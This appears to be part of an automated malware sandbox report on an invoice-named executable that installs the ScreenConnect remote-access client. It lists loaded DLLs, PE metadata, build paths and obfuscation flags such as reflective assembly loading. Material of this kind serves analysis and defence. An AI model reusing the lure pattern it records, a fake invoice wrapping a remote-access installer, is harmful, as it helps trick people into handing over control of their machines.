                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: certificate valid
                              Source: invoice-benefits-agency9-24-2024.exeStatic file information: File size 5622904 > 1048576
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452789959.0000000002682000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1401316749.0000000000CD2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: invoice-benefits-agency9-24-2024.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: invoice-benefits-agency9-24-2024.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: invoice-benefits-agency9-24-2024.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2607687774.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1459561536.0000000012700000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: invoice-benefits-agency9-24-2024.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2593006992.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1453273212.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452583861.0000000002530000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1453076491.00000000026C2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: invoice-benefits-agency9-24-2024.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1388670525.0000000000A8D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: invoice-benefits-agency9-24-2024.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1365745532.00000000049C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1363549444.0000000004B3D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1363549444.0000000004ACE000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: invoice-benefits-agency9-24-2024.exe, MSI29CB.tmp.3.dr, 5d26de.msi.3.dr, MSI299C.tmp.3.dr, setup.msi.0.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2607687774.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1459561536.0000000012700000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1401316749.0000000000CD2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: invoice-benefits-agency9-24-2024.exe, MSI22D5.tmp.2.dr, 5d26de.msi.3.dr, setup.msi.0.dr, 5d26dc.msi.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: invoice-benefits-agency9-24-2024.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452789959.0000000002682000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2607687774.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1459561536.0000000012700000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                              Data Obfuscation

                              barindex
                              Source: 0.2.invoice-benefits-agency9-24-2024.exe.5c90000.1.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: 0.0.invoice-benefits-agency9-24-2024.exe.14778f8.5.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: real checksum: 0x54fd91 should be: 0x564969
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeCode function: 0_2_034C6F00 push eax; mov dword ptr [esp], ecx0_2_034C6F11
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeCode function: 0_2_05EF53E8 push eax; retf 0_2_05EF54D9
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeCode function: 0_2_05F12F58 push eax; mov dword ptr [esp], edx0_2_05F12F6C
